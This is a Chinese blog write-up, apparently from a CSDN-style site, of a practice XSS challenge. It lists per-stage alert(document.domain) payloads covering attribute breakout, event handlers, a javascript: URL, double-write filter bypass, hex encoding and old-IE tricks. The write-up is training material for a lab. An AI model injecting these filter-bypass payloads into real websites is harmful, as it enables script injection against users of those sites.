xss challenge通关记录

xss challenge通关记录


Stage #1

在这里插入图片描述

//第一关没有任何过滤直接搞
<script>alert(document.domain);</script>

Stage #2

在这里插入图片描述

在这里插入图片描述

//需要闭合
"><script>alert(document.domain);</script>

Stage #3

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

抓包修改p2的值(选择国家那个地方

<script>alert(document.domain)</script>

在这里插入图片描述
在这里插入图片描述


Stage #4

在这里插入图片描述
发现有一个p3值是被隐藏了
在这里插入图片描述
在这里插入图片描述

"><script>alert(document.domain)</script><"

在这里插入图片描述


Stage #5

在这里插入图片描述
长度被限制了。。
修改这里👇之后再传入payload即可(记得闭合前边

在这里插入图片描述


Stage #6

在这里插入图片描述
在这里插入图片描述

>被过滤了
直接再value内利用onclick事件

"οnclick=alert(document.domain);name="/

Stage #7

在这里插入图片描述
与上一关相似.

" onclick=alert(document.domain)
//空格可以分割属性

在这里插入图片描述


Stage #8

在这里插入图片描述
这关是将输入的东西整到a标签中

在这里插入图片描述

javascript:alert(document.domain)

在这里插入图片描述


Stage #9

在这里插入图片描述
要用到utf-7编码。。。先略了


Stage #10

在这里插入图片描述
这关把domain过滤了,尝试一下双写

"><script>alert(document.domdomainain)</script>

Stage #11

不知道为啥打不开了。先略.


Stage #12

在这里插入图片描述
ie浏览器会把``(键盘左上横排数字的最左边用英文输入法)识别为双引号(<>被过滤就设置属性),构造payload。

``onclick=alert(document.domain)  //但是并未成功

Stage #13

在这里插入图片描述
未过。。

参考资料


Stage #14

在这里插入图片描述

background-color:salmon;input:e/**/xpression((window.x==1)?'':(window.x=1,alert(document.domain)))//dalao的payload

未成功 。。


Stage #15

在这里插入图片描述

进行16进制转换或者Unicode编码

\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e

Stage #16

打不开。。


Stage #17

在这里插入图片描述
只能在老版ie上可以成功。。直接看dalao的wp吧

在这里插入图片描述


Stage #18

在这里插入图片描述
依旧老ie。。

在这里插入图片描述

%A2%BE%BCscript%BEalert(document.domain);%BC/script%BE//dalao的payload

Stage #19

在这里插入图片描述
在twitter上找 DomXss at Sep 24,2010 。。


评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值